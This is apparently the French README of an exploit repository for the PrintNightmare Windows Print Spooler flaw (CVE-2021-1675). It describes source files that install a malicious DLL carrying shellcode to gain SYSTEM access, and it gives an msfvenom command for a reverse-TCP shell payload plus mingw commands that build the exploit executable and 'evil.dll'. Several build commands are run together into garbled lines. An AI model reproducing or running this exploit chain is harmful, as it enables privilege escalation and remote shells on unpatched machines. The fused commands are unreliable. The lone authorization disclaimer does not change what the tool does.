
Exploit d'élévation de privilèges locale pour CVE-2021-1675 (PrintNightmare) qui installe une DLL malveillante pour obtenir un accès SYSTEM sur les systèmes Windows vulnérables.
src/nightmare.cpp : code source pour exploiter CVE-2021-1675 et obtenir un accès système
en installant une dll malveillante
src/payload-dll.cpp : code source pour une dll avec un shellcode malveillant dans la fonction d'entrée
!!À utiliser uniquement sur des serveurs pour lesquels vous avez l'autorisation de tester
CVE-2021-1675 est une vulnérabilité dans le service Print Spooler de Microsoft Windows qui permet à un attaquant de contourner la vérification SeLoadDriverPrivilege. Cela peut être exploité pour obtenir une élévation de privilèges sur la machine cible en installant une DLL malveillante qui appelle un shellcode ou utilise l'API Windows pour établir une connexion reverse shell. Les versions de Windows 10/8/Server 2008/Server 2012 antérieures au 8 juin 2021 sont concernées.
$ msfvenom -p windows/shell/reverse_tcp EXITFUNC=THREAD LHOST=127.0.0.1 LPORT=4444 -f cx86_64-w64-mingw32-g++-win32 -o ./src/nightmare.o -c -g -Wall ./src/nightmare.cpp
x86_64-w64-mingw32-g++-win32 -o ./bin/PrintNightmareLPE.exe ./src/nightmare.o -lws2_32 -static-libgcc -static-libstdc++ -lole32 -lwinspoolx86_64-w64-mingw32-g++ src/payload-dll.cpp -lws2_32 -o lib/evil.dll -sharedzip ./bin/PrinterNightmareLPE.exe ./lib/